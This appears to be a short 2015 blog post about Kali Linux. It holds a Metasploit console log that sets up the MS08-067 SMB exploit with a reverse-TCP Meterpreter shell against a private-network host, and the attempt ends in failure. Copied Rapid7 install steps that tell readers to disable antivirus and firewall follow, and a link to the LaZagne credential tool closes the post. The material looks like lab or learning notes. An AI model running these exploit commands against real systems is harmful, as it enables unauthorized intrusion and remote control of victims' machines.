martes, 7 de julio de 2015

KALI LINUX

KALI  LINUX THE EVOLUTION OF BACKTRACK

https://www.youtube.com/watch?v=qvmKZE4LkyE
KALI LINUX INSTALLATION STEPS
INSTALACION DE KALI LINUX AQUI

ZEN CONSULTING 
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console.../
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


Save 45% of your time on large engagements with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1389 exploits - 788 auxiliary - 223 post        ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse
        [-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.14.129
lhost => 192.168.14.129
msf exploit(ms08_067_netapi) > set rhost 192.168.15.58
rhost => 192.168.15.58
msf exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf exploit(ms08_067_netapi) > set rport 445
rport => 445
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.15.58    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh,
thread, process, none)
   LHOST     192.168.14.129   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.14.129:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 8.1 -  - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target
msf exploit(ms08_067_netapi) >

Next steps to get started with Metasploit Pro


Thank you for your submission. In order to comply with United States export regulations, all requests for Metasploit Community and Metasploit Pro outside of the United States or Canada must be reviewed by Rapid7 to determine if you are a restricted government end user before you receive a license key. If you would like to access Metasploit Framework, please click here. We apologize for any inconvenience this may cause.

STEP 1: Download



STEP 2: Install

  • Metasploit uses some of the same techniques as malware and malicious attackers to audit your security. For Metasploit to run properly, you must switch off anti-virus solutions and your local firewall before the installation and during its use. If you are not comfortable turning off defenses on this computer, consider installing Metasploit on a dedicated virtual machine (set virtual machine NIC to bridged mode). Ubuntu works great and doesn't incur any OS licensing fees.
  • Once the download is complete, run the installer and follow the step by step instructions. This installer contains all Metasploit editions.

STEP 3: Activate

  • An email containing your license key has been sent to the email address provided on the previous registration page. Insert your license key into Metasploit to activate Metasploit Pro edition.
  • Note: It may take up to 15 mins to receive your license delivery email. Please check your spam folder, if you do not receive the email or cannot find the license key in the email, contact info@rapid7.com.




INTERESTING THIS NEW TOOL
https://github.com/AlessandroZ/LaZagne



No hay comentarios:

Publicar un comentario

Blogger Widgets